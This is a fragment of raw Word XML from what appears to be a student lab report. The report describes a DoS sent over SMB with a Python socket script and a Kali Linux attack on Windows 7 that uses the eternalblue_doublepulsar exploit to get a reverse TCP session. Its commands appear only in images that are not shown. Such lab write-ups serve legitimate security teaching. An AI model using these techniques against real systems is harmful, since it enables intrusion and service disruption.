    <w:p w14:paraId="21634F64" w14:textId="45A59776" w:rsidR="125D97DE" w:rsidRDefault="125D97DE" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sock.sendall</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> will send those data payload to the target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54188331" w14:textId="06B5C273" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E12D4E" w14:textId="4C9DCC5D" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F05B81" w14:textId="5D03235D" w:rsidR="125D97DE" w:rsidRDefault="125D97DE" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finally</w:t>
      </w:r>
      <w:r w:rsidR="01847E1F" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>we have verified that the attack is launching and have verified that we have sent</w:t>
      </w:r>
      <w:r w:rsidR="4EAB91CF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidR="2D973396" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using SMB data strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D672F" w14:textId="75BB45D8" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5AADB1" w14:textId="363EB1EE" w:rsidR="125D97DE" w:rsidRDefault="125D97DE" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092AFF2D" wp14:editId="4B4990FD">
            <wp:extent cx="4572000" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="704862129" name="Picture 70486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07693C85" w14:textId="454D8D1B" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02114935" w14:textId="331C8F46" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26486289" w14:textId="6910C1A1" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB3261B" w14:textId="587A7677" w:rsidR="521E8089" w:rsidRDefault="521E8089" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack </w:t>
      </w:r>
      <w:r w:rsidR="1E809806" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows 7 from Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="66498935" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="5BA8891F" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Automation Script for </w:t>
      </w:r>
      <w:r w:rsidR="66498935" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse TCP </w:t>
      </w:r>
      <w:r w:rsidR="355322C3" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="66498935" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ttack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E4FDF" w14:textId="38BF0F27" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038E5407" w14:textId="692D8D46" w:rsidR="10829BA9" w:rsidRDefault="10829BA9" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5074EA" w14:textId="27571957" w:rsidR="10829BA9" w:rsidRDefault="10829BA9" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37491271" w14:textId="05D7B340" w:rsidR="20E4C9BD" w:rsidRDefault="20E4C9BD" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tester: </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Isaac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA15F6" w14:textId="241BF567" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D8A59B" w14:textId="04B1978E" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This script </w:t>
      </w:r>
      <w:r w:rsidR="33F5D222" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>automizes</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the commands the user </w:t>
      </w:r>
      <w:r w:rsidR="2B712F68" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> type to create a session into Windows </w:t>
      </w:r>
      <w:r w:rsidR="460265C4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054EEC4E" w14:textId="7A74FC04" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F0E3F1" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="005E50AA">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FEA4EB5" wp14:editId="64EDD030">
            <wp:extent cx="3319756" cy="3184434"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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319756" cy="3184434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F34138" w14:textId="3E919DE6" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56894381" w14:textId="2D39717A" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74291AEA" w14:textId="1FE248C8" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3049F798" w14:textId="5F510EA5" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B641EDB" w14:textId="749629A5" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDBFF0B" w14:textId="07B0E171" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>What is happening is that</w:t>
      </w:r>
      <w:r w:rsidR="78EBE43F" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> once we have an idea of our target and its vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="279B9387" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, as seen below</w:t>
      </w:r>
      <w:r w:rsidR="66D04202" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606EAD49" w14:textId="700FE3DB" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B655789" w14:textId="3AA7A496" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536314F1" wp14:editId="188C1445">
            <wp:extent cx="5327926" cy="3175163"/>
            <wp:effectExtent l="0" t="0" r="6350"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327926" cy="3175163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC89AC4" w14:textId="76698362" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5917CA94" w14:textId="620ECAFC" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>We could try to implement different methods to exploit the target machine. In this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC0B73" w14:textId="4C8C95DA" w:rsidR="005E50AA" w:rsidRPr="00D079EE" w:rsidRDefault="779EA276" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="005E50AA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>xcersice</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E50AA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Windows 7 SP1 x32 bits. So</w:t>
      </w:r>
      <w:r w:rsidR="3D44E393" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E50AA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> I decided to run Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6EED30" w14:textId="61FAB59E" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AFE4BC" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E099B60" wp14:editId="5FCCF81A">
            <wp:extent cx="4216617" cy="3759393"/>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4216617" cy="3759393"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F9174" w14:textId="0C35C22B" w:rsidR="775BB15B" w:rsidRDefault="775BB15B"/>
    <w:p w14:paraId="7457B579" w14:textId="3E2AB0A6" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B"/>
    <w:p w14:paraId="329103CE" w14:textId="499EA069" w:rsidR="775BB15B" w:rsidRDefault="775BB15B"/>
    <w:p w14:paraId="4BE6F5B6" w14:textId="3D73DD50" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Then I loaded the exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eternalblue_doublepulsar</w:t>
      </w:r>
      <w:r w:rsidR="7BB7CC39" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="079B5404" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">which is infamous for being used for the </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wannacry </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D049C8C" w14:textId="636E8682" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766D12CB" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="00AC7223">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0144F947" wp14:editId="13DA114B">
            <wp:extent cx="4673841" cy="2286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4673841" cy="228612"/>
                    </a:xfrm>
